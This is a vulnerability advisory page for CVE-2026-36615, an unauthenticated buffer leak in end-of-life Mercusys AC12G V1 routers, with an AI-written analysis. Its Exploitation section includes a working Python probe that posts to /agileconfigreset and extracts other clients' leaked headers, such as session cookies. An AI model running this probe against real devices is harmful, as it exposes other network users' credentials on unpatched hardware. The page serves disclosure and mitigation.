VYPR
Medium severity (4.3) · NVD Advisory · Published Jun 3, 2026 · Updated Jun 3, 2026

CVE-2026-36615

Description

Mercusys AC12G V1 firmware leaks internal buffer contents via an undocumented /agileconfigreset endpoint to unauthenticated adjacent network attackers.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The Mercusys AC12G (EU) V1 router, in firmware versions AC12G(EU)_V1_200909 and AC12G(EU)_V1_210128, exposes an undocumented /agileconfigreset endpoint. The endpoint is reachable without authentication from the adjacent network (CVSS attack vector: Adjacent), and a POST request to it returns internal buffer contents.

Exploitation

An attacker on the adjacent network sends an unauthenticated POST request to /agileconfigreset. The router answers with a malformed HTTP response: 128 bytes from its internal HTTP header parse buffer are prepended to the actual response body. The buffer holds null-separated key-value pairs of the headers parsed from the current request [1].
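The following Python is an added example, not code from the advisory or from the vendor; it parses the malformed response described above and separates the attacker's own headers from anything else that came out of the shared buffer. The byte layout is an assumption drawn from the description: the 128 leaked bytes sit at the start of the body (or, if the status line itself is clobbered, at the start of the raw reply), and fields alternate key, value, each NUL-terminated. The sample response is constructed, not captured from a device. Because the reply is malformed HTTP, `http.client`-style parsers may reject it, so the `probe` helper reads raw bytes over a plain socket.

```python
"""Parse the 128-byte header-parse-buffer leak that CVE-2026-36615 describes
for the Mercusys AC12G V1 /agileconfigreset endpoint.

Added example, not the vendor's or the advisory's code. The byte layout
(leak at the start of the body, fields alternating key/value, NUL-separated)
is an assumption based on the advisory text; SAMPLE_RESPONSE is constructed.
"""
import socket

LEAK_LEN = 128          # bytes leaked per response, per the advisory
PATH = "/agileconfigreset"


def build_probe(host: str, path: str = PATH) -> bytes:
    """Raw HTTP/1.1 POST with an empty body. No credentials are needed:
    the endpoint is reachable unauthenticated."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Length: 0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def probe(host: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the probe over a plain socket and return the raw reply.
    A plain socket is used deliberately: the reply is malformed HTTP and
    http.client may refuse to parse it. Not called at import time."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def split_leak(raw: bytes) -> tuple[bytes, bytes]:
    """Separate the leaked buffer from the rest of the reply.

    Assumed layouts: if the reply starts with a status line, the leak is
    the first LEAK_LEN bytes of the body; otherwise the leak precedes the
    whole reply. Returns (leak, reply_without_leak)."""
    if raw.startswith(b"HTTP/"):
        end = raw.find(b"\r\n\r\n")
        if end < 0:                       # headers never terminated
            return b"", raw
        body = end + 4
        return raw[body:body + LEAK_LEN], raw[:body] + raw[body + LEAK_LEN:]
    return raw[:LEAK_LEN], raw[LEAK_LEN:]


def parse_leaked_headers(leak: bytes) -> dict[str, str]:
    """Decode NUL-separated key/value pairs. Trailing NUL padding and an
    unpaired final field (a truncated entry) are dropped."""
    fields = [f.decode("latin-1") for f in leak.split(b"\x00") if f]
    return {fields[i]: fields[i + 1] for i in range(0, len(fields) - 1, 2)}


def foreign_fields(pairs: dict[str, str], probe_bytes: bytes) -> dict[str, str]:
    """Headers in the leak that the probe did not send. Because the parse
    buffers come from a shared pool, these are candidates for residue from
    other clients' requests, which is where the real exposure lies."""
    sent = set()
    for line in probe_bytes.split(b"\r\n")[1:]:
        if b":" in line:
            sent.add(line.split(b":", 1)[0].strip().lower().decode())
    return {k: v for k, v in pairs.items() if k.lower() not in sent}


# Constructed sample, not captured from a device: the probe's own headers
# followed by a stale Cookie field standing in for another client's data.
SAMPLE_LEAK = (
    b"Host\x00192.168.1.1\x00Content-Length\x000\x00Connection\x00close\x00"
    b"Cookie\x00session=abc123\x00"
).ljust(LEAK_LEN, b"\x00")
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    + SAMPLE_LEAK
    + b"<html>ok</html>"
)


if __name__ == "__main__":
    leak, rest = split_leak(SAMPLE_RESPONSE)
    pairs = parse_leaked_headers(leak)
    print("leaked fields:", pairs)
    print("not sent by us:", foreign_fields(pairs, build_probe("192.168.1.1")))
```

Against a live device, `probe(host)` replaces `SAMPLE_RESPONSE`; any field `foreign_fields` reports is the part of the leak worth caring about, since the attacker already knows the headers it sent itself.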

Impact

Successful exploitation discloses sensitive information. The leaked buffer contains the parsed headers of the current request, which aids reconnaissance for further attacks. Because the parse buffers come from a shared pool, residue from other clients' requests may also be exposed [1]; since the attacker already knows its own headers, that residue (for example cookies or credentials carried in another client's request headers) is the material exposure.

Mitigation

The affected product, Mercusys AC12G (EU) V1, is end-of-life and no fix is planned. The recommended remediation is to remove the undocumented /agileconfigreset endpoint from production firmware or, if it must remain, to require authentication and add proper error handling. Response buffers should also be initialized before use [1]. With no vendor fix available, operators should replace the device or at minimum restrict which hosts can reach its web interface.

AI Insight generated on Jun 3, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0

No patches discovered yet.

Vulnerability mechanics

No source-code context is available for this CVE. The mechanics section is only generated when the actual fix diff can be read; without it, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.

References: 1

News mentions: 1